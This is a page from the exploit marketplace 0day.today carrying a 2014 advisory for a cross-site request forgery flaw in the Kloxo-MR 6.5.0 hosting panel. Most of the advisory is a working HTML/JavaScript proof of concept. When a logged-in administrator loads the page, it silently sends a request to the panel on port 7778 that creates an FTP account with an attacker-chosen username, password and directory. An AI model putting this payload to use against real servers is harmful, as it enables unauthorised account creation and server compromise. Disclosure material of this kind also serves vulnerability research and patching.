0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kloxo-MR 6.5.0 - CSRF Vulnerability
# Exploit Title :Kloxo-MR 6.5.0 CSRF Vulnerability # Vendor Homepage :https://github.com/mustafaramadhan/kloxo/tree/dev # Version :Kloxo-MR 6.5.0.f-2014020301 # Tested on :Centos 6.4 # Exploit Author :Necmettin COSKUN =>@babayarisi # Blog :http://www.ncoskun.com http://www.grisapka.org # Discovery date :03/12/2014 # CVE :N/A Kloxo-MR is special edition (fork) of Kloxo with many features not existing on Kloxo official release (6.1.12+). This fork named as Kloxo-MR (meaning 'Kloxo fork by Mustafa Ramadhan'). ================ CSRF Vulnerability Vulnerability ================ Kloxo-MR has lots of POST and GET based form applications like Kloxo stable , some inputs escaped from specialchars but inputs dont have any csrf protection or secret key So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts. Poc Exploit ================ <html> <head><title>Kloxo-MR demo</title></head> <script type="text/javascript"> function yurudi(){ /////////////////////////////////////////////////////////// //Kloxo-MR 6.5.0 CSRF Vulnerability // //Author:Necmettin COSKUN => twitter.com/@babayarisi // //Blog: http://www.ncoskun.com | http://www.grisapka.org // /////////////////////////////////////////////////////////// //Remote host var host="victim.com"; //New Ftp Username var username="demouser"; //New Ftp Password var pass="12345678"; //This creates new folder under admin dir. /admin/yourfolder var dir="demodirectory"; //If necessary only modify http to https ;) var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add"; document.getElementById('demoexploit').src=urlson; } </script> <body onload="yurudi();"> <img id="demoexploit" src=""></img> </body> </html> Discovered by: ================ Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha! # 0day.today [2024-12-25] #